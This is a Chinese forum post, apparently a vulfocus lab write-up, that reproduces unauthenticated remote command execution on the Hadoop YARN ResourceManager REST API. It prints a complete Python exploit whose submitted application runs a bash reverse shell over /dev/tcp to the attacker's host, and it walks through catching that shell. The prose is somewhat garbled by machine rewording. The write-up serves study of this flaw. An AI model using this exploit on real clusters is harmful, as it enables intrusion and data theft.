ToB企服应用市场:ToB评测及商务社交产业平台

标题: hadoop未授权访问下令执行漏洞复现-vulfocus [打印本页]

作者: 大连全瓷种植牙齿制作中心    时间: 2024-8-30 21:28
标题: hadoop未授权访问下令执行漏洞复现-vulfocus
1 先容

Hadoop YARN(Yet Another Resource Negotiator)的ResourceManager是集群资源管理的焦点组件,负责分配和管理集群资源以及调度作业。如果ResourceManager出现未授权访问漏洞,可能答应未经认证的用户访问或操作集群资源,这可能会导致数据走漏、资源滥用或拒绝服务攻击。在这个复现中就是在组件的ui界面上出现了未授权访问漏洞
2 涉及版本

hadoop **3.3.0**以下

vulfocus上的是2.8.1版本
3 复现

vulfocus打开靶机

这个地方有映射关系,8088是hadoop的"All Applications"页面,通常不是一个单独的组件,而是Hadoop生态系统中某些组件的用户界面(UI)的一部分,它可能用于展示和管理集群中的各种应用程序。
待会我们需要使用exp对这个页面/cluster/apps进行未授权漏洞的攻击
参考exp:https://www.cnblogs.com/cute-puli/p/14944637.html
  1. `#!/usr/bin/env python  
  2.   
  3. import requests  
  4.   
  5. target = 'http://123.58.224.8:31840/'  目标网址
  6. lhost = '用来反弹的ip' # put your local host ip here, and listen at port 9999  
  7.   
  8. url = target + 'ws/v1/cluster/apps/new-application'  
  9. resp = requests.post(url)  
  10. app_id = resp.json()['application-id']  
  11. url = target + 'ws/v1/cluster/apps'  
  12. data = {  
  13.     'application-id': app_id,  
  14.     'application-name': 'get-shell',  
  15.     'am-container-spec': {  
  16.         'commands': {  
  17.             'command': '/bin/bash -i >& /dev/tcp/%s/反弹到的端口号 0>&1' % lhost,  
  18.         },  
  19.     },  
  20.     'application-type': 'YARN',  
  21. }  
  22. requests.post(url, json=data)
复制代码
由于我中间出去用饭了,所从前后靶机ip有变革了
因为要反弹shell,以是你的外网机需要开一下对应的端口
这个已经有反应了,但是我外网机上面没收到,明明添加了安全组但是却没收到shell
解决:解决阿里云的端口添加安全组仍然无法扫描到-CSDN博客
要先监听到端口,这个端口绑定了服务才可以扫描和访问上

这样就可以了,已经反弹过来了
我们根据vulfocus的提示查察env情况变量,我这里是退回到根目录了


免责声明:如果侵犯了您的权益,请联系站长,我们会及时删除侵权内容,谢谢合作!更多信息从访问主页:qidao123.com:ToB企服之家,中国第一个企服评测及商务社交产业平台。




欢迎光临 ToB企服应用市场:ToB评测及商务社交产业平台 (https://dis.qidao123.com/) Powered by Discuz! X3.4